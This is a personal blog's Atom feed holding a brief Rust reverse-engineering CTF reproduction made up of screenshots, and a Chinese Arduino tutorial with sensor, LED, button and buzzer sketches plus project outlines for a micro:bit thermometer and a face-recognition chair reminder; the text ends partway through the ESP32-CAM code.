atom.xml

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>求知欲，好奇心，勇毅前行</title>
  <icon>https://www.gravatar.com/avatar/260de78781b3355b5fcbb52d09a7a2a9</icon>
  <subtitle>求知欲，好奇心，勇毅前行</subtitle>
  <link href="https://github.com/xyy9233/xyy9233.github.io.git/atom.xml" rel="self"/>
  
  <link href="https://github.com/xyy9233/xyy9233.github.io.git/"/>
  <updated>2025-01-09T07:39:01.898Z</updated>
  <id>https://github.com/xyy9233/xyy9233.github.io.git/</id>
  
  <author>
    <name>W3nL0u</name>
    <email>1768765226@qq.com</email>
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>🦀！rust的味道！</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2025/01/08/rust-de-wei-dao/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2025/01/08/rust-de-wei-dao/</id>
    <published>2025-01-08T09:48:01.045Z</published>
    <updated>2025-01-09T07:39:01.898Z</updated>
    
    <content type="html"><![CDATA[<h1 id="简单了解一下rust和moonbit"><a href="#简单了解一下rust和moonbit" class="headerlink" title="简单了解一下rust和moonbit"></a>简单了解一下rust和moonbit</h1><p>总想着复现整理一下之前lilran师傅出的那个rust题目，也一直想简单了解rust逆向。</p><p>最近期末周事情也少很多，背烦了，看pwn师傅在学rust，想起之前lilran说说发的moonbit，</p><h2 id="不管，先复现这道题："><a href="#不管，先复现这道题：" class="headerlink" title="不管，先复现这道题："></a>不管，先复现这道题：</h2><p>打开rust，映入眼帘的是错综复杂的各种引用，</p><p>跟着lilran师傅的步骤逐个看：</p><p>主函数系列creat函数：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250109125109431.png" alt="image-20250109125109431"></p><p>接着是输出：</p><p>堆上分配长度48的长度，输入flag<img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250109125511430.png" alt="image-20250109125511430"></p><p>检测：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250109125913137.png" alt="image-20250109125913137"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;简单了解一下rust和moonbit&quot;&gt;&lt;a href=&quot;#简单了解一下rust和moonbit&quot; class=&quot;headerlink&quot; title=&quot;简单了解一下rust和moonbit&quot;&gt;&lt;/a&gt;简单了解一下rust和moonbit&lt;/h1&gt;&lt;p&gt;总想着复现整</summary>
      
    
    
    
    
  </entry>
  
  <entry>
    <title>Arduino入门了解</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2025/01/01/arduino-ru-men-dao-jing-tong/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2025/01/01/arduino-ru-men-dao-jing-tong/</id>
    <published>2025-01-01T11:42:45.835Z</published>
    <updated>2025-01-01T13:37:43.703Z</updated>
    
    <content type="html"><![CDATA[<h1 id="Arduino入门到精通"><a href="#Arduino入门到精通" class="headerlink" title="Arduino入门到精通"></a>Arduino入门到精通</h1><h2 id="超声波传感器"><a href="#超声波传感器" class="headerlink" title="超声波传感器"></a>超声波传感器</h2><p>HC-SR04超声波传感器使用声纳来确定物体的距离，就像蝙蝠一样。它提供了非常好的非接触范围检测，准确度高，读数稳定，易于使用，尺寸从2厘米到400厘米或1英寸到13英尺不等。</p><p>其操作不受阳光或黑色材料的影响，尽管在声学上，柔软的材料（如布料等）可能难以检测到。它配有超声波发射器和接收器模块。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250101193100065.png" alt="image-20250101193100065"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250101193110805.png" alt="image-20250101193110805"></p><p><strong>技术规格</strong></p><p>电源 - + 5V DC<br> 静态电流 - &lt;2mA<br> 工作电流 - 15mA<br> 有效角度 - &lt;15°<br> 测距距离 - 2厘米-400厘米&#x2F;1英寸-13英尺<br> 分辨率 - 0.3厘米<br> 测量角度 - 30度</p><p><strong>必需的组件</strong></p><p>你将需要以下组件：</p><ul><li><p>1 × Breadboard 面包板</p></li><li><p>1 × Arduino Uno R3</p></li><li><p>1 × 超声波传感器（HC-SR04）</p></li></ul><p><strong>程序</strong></p><p>按照电路图进行连接，如下图所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250101193124318.png" alt="image-20250101193124318"></p><p><strong>草图</strong></p><p>在计算机上打开Arduino IDE软件。使用Arduino语言进行编码控制你的电路。通过单击“New”打开一个新的草图文件。</p><h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">const int pingPin = 7; // Trigger Pin of Ultrasonic Sensor</span><br><span class="line">const int echoPin = 6; // Echo Pin of Ultrasonic Sensor</span><br><span class="line"></span><br><span class="line">void setup() &#123;</span><br><span class="line">   Serial.begin(9600); // Starting Serial Terminal</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void loop() &#123;</span><br><span class="line">   long duration, inches, cm;</span><br><span class="line">   pinMode(pingPin, OUTPUT);</span><br><span class="line">   digitalWrite(pingPin, LOW);</span><br><span class="line">   delayMicroseconds(2);</span><br><span class="line">   digitalWrite(pingPin, HIGH);</span><br><span class="line">   delayMicroseconds(10);</span><br><span class="line">   digitalWrite(pingPin, LOW);</span><br><span class="line">   pinMode(echoPin, INPUT);</span><br><span class="line">   duration = pulseIn(echoPin, HIGH);</span><br><span class="line">   inches = microsecondsToInches(duration);</span><br><span class="line">   cm = microsecondsToCentimeters(duration);</span><br><span class="line">   Serial.print(inches);</span><br><span class="line">   Serial.print(&quot;in, &quot;);</span><br><span class="line">   Serial.print(cm);</span><br><span class="line">   Serial.print(&quot;cm&quot;);</span><br><span class="line">   Serial.println();</span><br><span class="line">   delay(100);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">long microsecondsToInches(long microseconds) &#123;</span><br><span class="line">   return microseconds / 74 / 2;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">long microsecondsToCentimeters(long microseconds) &#123;</span><br><span class="line">   return microseconds / 29 / 2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>代码说明</strong></p><p>超声波传感器有四个端子：+5V，Trigger，Echo和GND，连接如下：</p><p>·    将+5V引脚连接到Arduino板上的+5v。</p><p>·    将Trigger连接到Arduino板上的数字引脚7。</p><p>·    将Echo连接到Arduino板上的数字引脚6。</p><p>·    将GND连接到Arduino上的GND。</p><p>在我们的程序中，我们通过串口显示了传感器测量的距离，单位为英寸和厘米。</p><p><strong>结果</strong></p><p>你将在Arduino串口监视器上看到传感器测量的距离，单位为英寸和厘米。</p><h2 id="LED-闪烁实验"><a href="#LED-闪烁实验" class="headerlink" title="LED 闪烁实验"></a><strong>LED 闪烁实验</strong></h2><p>LED 小灯实验是比较基础的实验之一，上一个“ Hello World！”实验里已经利用到了Arduino 自带的LED，这次我们利用其他I&#x2F;O 口和外接直插LED 灯来完成这个实验，我们需要的实验器材除了每个实验都必须的Arduino 控制器和USB 下载线以外的</p><p>实验用到的元器件清单如下：</p><ol><li>红色M5 直插LED*1</li></ol><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image002.jpg" alt="img"></p><ol start="2"><li>220Ω直插电阻*1</li></ol><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image004.jpg" alt="img"></p><ol start="3"><li>面包板*1</li></ol><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image006.jpg" alt="img"></p><ol start="4"><li>面包板跳线*1 扎</li></ol><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image008.jpg" alt="img"></p><p>下一步我们按照下面的小灯实验原理图链接实物图，这里我们使用数字10 接口。使用发光二极管LED 时，要连接限流电阻，这里为220Ω电阻，否则电流过大会烧毁发光二极管。</p><p>小灯实验原理图</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image010.jpg" alt="img"></p><p> 实物图连接图：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image012.jpg" alt="img"></p><p>按照上图链接好电路后，就可以开始编写程序了，我们还是让LED 小灯闪烁，点亮1 秒熄灭1 秒。这个程序很简单与Arduino 自带的例程里的Blink 相似只是将13 数字接口换做10 数字接口。</p><p>-———————————————————-</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">int ledPin = 10; //定义数字10 接口</span><br><span class="line"></span><br><span class="line">void setup()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">pinMode(ledPin, OUTPUT);//定义小灯接口为输出接口</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void loop()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">digitalWrite(ledPin, HIGH); //点亮小灯</span><br><span class="line"></span><br><span class="line">delay(1000); //延时1 秒</span><br><span class="line"></span><br><span class="line">digitalWrite(ledPin, LOW); //熄灭小灯</span><br><span class="line"></span><br><span class="line">delay(1000); // 延时1 秒</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>-——————————————————–</p><p>下载完程序就可以看到我们的10 口外接小灯在闪烁了，这样我们的</p><p>实验现象为LED不停闪烁，间隔大约为一秒。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image014.jpg" alt="img"></p><p>小灯闪烁实验就完成了。谢谢！</p><h2 id="按键控制LED实验"><a href="#按键控制LED实验" class="headerlink" title="按键控制LED实验"></a><strong>按键控制LED实验</strong></h2><p>I&#x2F;O 口的意思即为INPUT 接口和OUTPUT 接口，到目前为止我们设计的小灯实验都还只是应用到Arduino 的I&#x2F;O 口的输出功能，这个实验我们来尝试一下使用Arduino的I&#x2F;O 口的输入功能即为读取外接设备的输出值，我们用一个按键和一个LED 小灯完成一个输入输出结合使用的实验，让大家能简单了解I&#x2F;O 的作用。按键开关大家都应该比较了解，属于开关量（数字量）元件，按下时为闭合（导通）状态。完成本实验要</p><p>用到的元件如下：</p><p>​按键开关*1 </p><p>​红色M5 直插LED*1 </p><p>​220Ω电阻*1</p><p>​10KΩ电阻*1 </p><p>​面包板*1</p><p>​面包板跳线*1 扎</p><p>我们将按键接到数字7 接口，红色小灯接到数字11 接口（Arduino 控制器0-13 数字I&#x2F;O 接口都可以用来接按键和小灯，但是尽量不选择0 和1 接口，0 和1 接口为接口功能复用，除I&#x2F;O 口功能外也是串口通信接口，下载程序时属于与PC 机通信故应保持0 和1 接口悬空，所以为避免插拔线的麻烦尽量不选用0 和1 接口），按下面的原理图连接好电路。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image002.gif" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image004.gif" alt="img"></p><p>下面开始编写程序，我们就让按键按下时小灯亮起，根据前面的学习相信这个程序很容易就能编写出来，相对于前面几个实验这个实验的程序中多加了一条条件判断语句，这里我们使用if 语句，Arduino 的程序便写语句是基于C 语言的，所以C 的条件判断语句自然也适用于Arduino，像while、swich 等等。这里根据个人喜好我们习惯</p><p>于使用简单易于理解的if 语句给大家做演示例程。</p><p>我们分析电路可知当按键按下时，数字7 接口可读出为高电平，这时我们使数字11 口输出高电平可使小灯亮起，程序中我们判断数字7 口是否为低电平，要为低电平使数字11 口输出也为低电平小灯不亮，原理同上。</p><p>参考源程序：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"> </span><br><span class="line"></span><br><span class="line">int ledpin=11;//定义数字11 接口</span><br><span class="line"></span><br><span class="line">int inpin=7;//定义数字7 接口</span><br><span class="line"></span><br><span class="line">int val;//定义变量val</span><br><span class="line"></span><br><span class="line">void setup()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">pinMode(ledpin,OUTPUT);//定义小灯接口为输出接口</span><br><span class="line"></span><br><span class="line">pinMode(inpin,INPUT);//定义按键接口为输入接口</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void loop()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">val=digitalRead(inpin);//读取数字7 口电平值赋给val</span><br><span class="line"></span><br><span class="line">if(val==LOW)//检测按键是否按下，按键按下时小灯亮起</span><br><span class="line"></span><br><span class="line">&#123; digitalWrite(ledpin,LOW);&#125;</span><br><span class="line"></span><br><span class="line">else</span><br><span class="line"></span><br><span class="line">&#123; digitalWrite(ledpin,HIGH);&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">![img](https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image006.gif)</span><br></pre></td></tr></table></figure><p>下载完程序我们本次的小灯配合按键的实验就完成了，本实验的原理很简单，广泛被用于各种电路和电器中，实际生活中大家也不难在各种设备上发现，例如大家的手机当按下任一按键时背光灯就会亮起，这就是典型应用了。</p><p>延伸示范：交通红绿灯管控</p><ol><li><p>三個LED灯和2个按键开关</p></li><li><p>按下第一个按键，3个LED(红绿灯按照顺序闪亮)</p></li><li><p>按下第二个按键，呈现全绿灯（开放全线通行）</p></li></ol><h2 id="蜂鸣器发声实验"><a href="#蜂鸣器发声实验" class="headerlink" title="蜂鸣器发声实验"></a>蜂鸣器发声实验</h2><p>用Arduino 可以完成的互动作品有很多，最常见也最常用的就是声光展示了，前面一直都是在用LED 小灯在做实验，本个实验就让大家的电路发出声音，能够发出声音的最常见的元器件就是蜂鸣器和喇叭了，两者相比较蜂鸣器更简单和易用所以我们本实验采用蜂鸣器。</p><p>以下是要准备的元件：</p><p>蜂鸣器*1</p><p>按键*1 </p><p>面包板*1 </p><p>面包板跳线*1 扎</p><p>照下面的原理图连接电路，</p><p><img src="file:///C:/Users/lenovo/AppData/Local/Temp/msohtmlclip1/01/clip_image002.gif" alt="img"></p><p>连接电路时要注意一点就是蜂鸣器有正负极之分，下面右侧实物图可看到蜂鸣器有红黑两种接线。连接好电路程序这方面就很简单了，与前面按键控制小灯是实验程序类似，因为蜂鸣器的控制接口也是数字接口输出高低电平就可以控制蜂鸣器的鸣响。</p><p>参考源程序：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">int buzzer=8;//设置控制蜂鸣器的数字IO脚</span><br><span class="line"></span><br><span class="line">void setup() </span><br><span class="line"></span><br><span class="line">&#123; </span><br><span class="line"></span><br><span class="line">pinMode(buzzer,OUTPUT);//设置数字IO脚模式，OUTPUT为辒出 </span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">void loop() </span><br><span class="line"></span><br><span class="line">&#123; </span><br><span class="line"></span><br><span class="line">unsigned char i,j;//定义变量</span><br><span class="line"></span><br><span class="line">while(1) </span><br><span class="line"></span><br><span class="line">&#123; </span><br><span class="line"></span><br><span class="line">for(i=0;i&lt;80;i++)//辒出一个频率的声音</span><br><span class="line"></span><br><span class="line">&#123; </span><br><span class="line"></span><br><span class="line">digitalWrite(buzzer,HIGH);//发声音</span><br><span class="line"></span><br><span class="line">delay(1);//延时1ms </span><br><span class="line"></span><br><span class="line">digitalWrite(buzzer,LOW);//不发声音</span><br><span class="line"></span><br><span class="line">delay(1);//延时ms </span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">for(i=0;i&lt;100;i++)//辒出另一个频率癿声音 </span><br><span class="line"></span><br><span class="line">&#123; </span><br><span class="line"></span><br><span class="line">digitalWrite(buzzer,HIGH);//发声音</span><br><span class="line"></span><br><span class="line">delay(2);//延时2ms </span><br><span class="line"></span><br><span class="line">digitalWrite(buzzer,LOW);//不发声音</span><br><span class="line"></span><br><span class="line">delay(2);//延时2ms </span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure><p>下载完程序，蜂鸣器实验就完成了.</p><h2 id="简单的电子体温计设计"><a href="#简单的电子体温计设计" class="headerlink" title="简单的电子体温计设计"></a>简单的电子体温计设计</h2><h3 id="摘要"><a href="#摘要" class="headerlink" title="摘要:"></a>摘要:</h3><p>本报告旨在介绍基于 Micro:bit 的蓝牙测温仪的设计和开发，以解决远程测量体温的问题。我们还将提供一个简单的加密协议，以确保数据的安全传输。</p><h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h3><p>随着全球范围内新冠疫情的蔓延，远程测量体温变得尤为重要。本报告介绍了一种使用Micro:bit开发的蓝牙测温仪，使用户能够方便地进行体温测量并将数据传输到远程设备。</p><h3 id="蓝牙传输与简单加密协议"><a href="#蓝牙传输与简单加密协议" class="headerlink" title="蓝牙传输与简单加密协议"></a>蓝牙传输与简单加密协议</h3><p>为确保数据的安全传输，我们设计了一个简单的加密协议。该协议基于对称加密算法，使用预共享密钥对传输的温度数据进行加密和解密。这样，只有具有正确密钥的接收方才能解密并读取温度数据</p><h3 id="模块构成"><a href="#模块构成" class="headerlink" title="模块构成:"></a>模块构成:</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250101194605692.png" alt="image-20250101194605692"></p><h3 id="功能描述"><a href="#功能描述" class="headerlink" title="功能描述:"></a>功能描述:</h3><p>​左侧为温度传感器，按下按钮a后无线传出加密温度数据进入右侧接收器接收器对数据进行解密后显示结果。当温度小于37℃时滚动显示温度数字。当温度大于 37℃时，传感器会通过蜂鸣器报警并闪烁叹号“”图案，然后显示温度来提示体温超标。</p><p>​加密方式采取简单的类凯撒加密，体温不涉及高端机密，采用简单加密旨在避免采用直白数据信号被其他信号干扰，提升系统的抗干扰能力。</p><h3 id="凯撒加密"><a href="#凯撒加密" class="headerlink" title="凯撒加密"></a>凯撒加密</h3><p>凯撒密码(Caesar)加密时会将明文中的每个字母都按照其在字母表中的顺序向后(或向前)移动固定数目(循环移动)作为密文。例如，当偏移量是左移3的时候(解密时的密钥就是3):</p><h3 id="代码构成"><a href="#代码构成" class="headerlink" title="代码构成:"></a>代码构成:</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250101194703350.png" alt="image-20250101194703350"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250101194722377.png" alt="image-20250101194722377"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250101194737327.png" alt="image-20250101194737327"></p><p>这是一个非常有趣且实用的Arduino项目。以下是项目实现的详细说明和实现建议，包括硬件需求、步骤以及仿真可能性：</p><hr><h3 id="项目概述"><a href="#项目概述" class="headerlink" title="项目概述"></a><strong>项目概述</strong></h3><p>项目目标是设计一个系统，通过摄像头进行人脸识别身份验证，绑定办公椅上的压力传感器，检测坐姿或坐立状态，并通过定时提醒用户起身活动。可以将系统用于健康办公管理。</p><hr><h3 id="项目实现的主要模块"><a href="#项目实现的主要模块" class="headerlink" title="项目实现的主要模块"></a><strong>项目实现的主要模块</strong></h3><ol><li><strong>人脸识别模块</strong><ul><li>使用摄像头和人脸识别库进行身份验证。</li><li>验证用户是否为预设身份。</li></ul></li><li><strong>压力传感器模块</strong><ul><li>使用压力传感器检测用户是否坐在椅子上。</li></ul></li><li><strong>定时提醒模块</strong><ul><li>通过Arduino内置计时器或RTC模块，实现定时提醒功能。</li></ul></li><li><strong>输出提醒模块</strong><ul><li>通过蜂鸣器、LED灯或者LCD屏，提示用户起身活动。</li></ul></li></ol><hr><h3 id="硬件需求"><a href="#硬件需求" class="headerlink" title="硬件需求"></a><strong>硬件需求</strong></h3><ol><li><strong>主控板</strong>：<ul><li>ESP32-CAM（带Wi-Fi的摄像头模块，支持简单AI功能）。</li><li>或者 Raspberry Pi（如果需要更强大的计算能力）。</li></ul></li><li><strong>传感器</strong>：<ul><li>压力传感器（如FSR402或HX711配合称重传感器）。</li></ul></li><li><strong>输出设备</strong>：<ul><li>蜂鸣器、LED灯或者OLED屏（用于提醒）。</li></ul></li><li><strong>其他</strong>：<ul><li>5V电源模块或USB供电。</li><li>面包板、跳线、固定支架等。</li></ul></li></ol><hr><h3 id="软件需求"><a href="#软件需求" class="headerlink" title="软件需求"></a><strong>软件需求</strong></h3><ol><li><strong>开发环境</strong>：<ul><li>Arduino IDE（适用于ESP32-CAM）。</li><li>或者 Raspberry Pi 配合 Python。</li></ul></li><li><strong>人脸识别软件库</strong>：<ul><li><strong>ESP32-CAM</strong>: 使用OpenCV库的轻量级版本或者ESP-WHO库（官方提供的人脸识别支持）。</li><li><strong>Raspberry Pi</strong>: 使用OpenCV或Dlib实现人脸识别。</li></ul></li><li><strong>压力数据处理</strong>：<ul><li>根据传感器数据调整阈值，判断是否有人坐在椅子上。</li></ul></li></ol><hr><h3 id="项目实现步骤"><a href="#项目实现步骤" class="headerlink" title="项目实现步骤"></a><strong>项目实现步骤</strong></h3><h4 id="1-人脸识别模块"><a href="#1-人脸识别模块" class="headerlink" title="1. 人脸识别模块"></a>1. <strong>人脸识别模块</strong></h4><ul><li>使用ESP32-CAM摄像头捕捉图像。</li><li>加载人脸识别库（ESP-WHO）。</li><li>将用户的人脸数据注册到设备中，作为预设用户身份。</li><li>每次检测时，系统会将当前捕捉到的人脸数据与已注册数据比对，验证身份。</li></ul><h4 id="2-压力传感器模块"><a href="#2-压力传感器模块" class="headerlink" title="2. 压力传感器模块"></a>2. <strong>压力传感器模块</strong></h4><ul><li>将压力传感器安装在椅子座位上。</li><li>将传感器的信号连接到Arduino，通过读取传感器电压值判断是否有人坐下。</li><li>设置一个阈值，例如超过某个电压值即判断“有人坐下”，否则为空座状态。</li></ul><h4 id="3-定时提醒模块"><a href="#3-定时提醒模块" class="headerlink" title="3. 定时提醒模块"></a>3. <strong>定时提醒模块</strong></h4><ul><li>通过Arduino内置计时器，每次用户入座后，启动计时。</li><li>在设定时间（如30分钟）内，检测压力传感器是否一直处于“有人”的状态。</li><li>如果时间到达且用户未离开，触发提醒。</li></ul><h4 id="4-输出提醒模块"><a href="#4-输出提醒模块" class="headerlink" title="4. 输出提醒模块"></a>4. <strong>输出提醒模块</strong></h4><ul><li>使用蜂鸣器播放提醒音</li></ul><hr><h3 id="仿真方式"><a href="#仿真方式" class="headerlink" title="仿真方式"></a><strong>仿真方式</strong></h3><p>您可以在软件环境中模拟项目功能，以下是仿真方式建议：</p><ol><li><strong>Tinkercad</strong>（适用于简单Arduino项目）：<ul><li>Tinkercad支持Arduino仿真，您可以通过压力传感器模块和LED模块模拟检测和提醒功能。</li><li><strong>限制</strong>：摄像头模块功能有限，无法仿真人脸识别。</li></ul></li><li><strong>ESP32-CAM硬件仿真</strong>：<ul><li>使用实际ESP32-CAM模块，编写代码并测试人脸识别功能。</li><li>摄像头可以连接到Arduino IDE进行调试。</li></ul></li><li><strong>Raspberry Pi仿真</strong>：<ul><li>使用PC或Raspberry Pi加载OpenCV库，通过Python脚本实现人脸识别功能仿真。</li><li>您可以用USB摄像头在PC上运行相同的代码进行验证。</li></ul></li></ol><hr><h3 id="代码-1"><a href="#代码-1" class="headerlink" title="代码"></a>代码</h3><h4 id="1-ESP32-CAM人脸识别代码（ESP-WHO库）"><a href="#1-ESP32-CAM人脸识别代码（ESP-WHO库）" class="headerlink" title="1. ESP32-CAM人脸识别代码（ESP-WHO库）"></a><strong>1. ESP32-CAM人脸识别代码（ESP-WHO库）</strong></h4><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;esp_camera.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;FDForward.h&quot;</span> <span class="comment">// 人脸识别库</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;fr_forward.h&quot;</span> </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">setup</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  Serial.<span class="built_in">begin</span>(<span class="number">115200</span>);</span><br><span class="line">  <span class="comment">// 初始化摄像头模块</span></span><br><span class="line">  <span class="type">camera_config_t</span> config;</span><br><span class="line">  config.ledc_channel = LEDC_CHANNEL_0;</span><br><span class="line">  config.ledc_timer = LEDC_TIMER_0;</span><br><span class="line">  config.pin_d0 = Y2_GPIO_NUM;</span><br><span class="line">  <span class="comment">// 其他配置...</span></span><br><span class="line">  <span class="built_in">esp_camera_init</span>(&amp;config);</span><br><span class="line">  Serial.<span class="built_in">println</span>(<span class="string">&quot;摄像头初始化完成&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">loop</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="type">camera_fb_t</span> *fb = <span class="built_in">esp_camera_fb_get</span>();</span><br><span class="line">  <span class="keyword">if</span> (!fb) &#123;</span><br><span class="line">    Serial.<span class="built_in">println</span>(<span class="string">&quot;图像获取失败&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 人脸识别处理</span></span><br><span class="line">  <span class="type">int</span> face_id = <span class="built_in">recognize_face</span>(fb);</span><br><span class="line">  <span class="keyword">if</span> (face_id &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">    Serial.<span class="built_in">println</span>(<span class="string">&quot;身份验证通过&quot;</span>);</span><br><span class="line">    <span class="comment">// 执行后续操作</span></span><br><span class="line">  &#125; <span 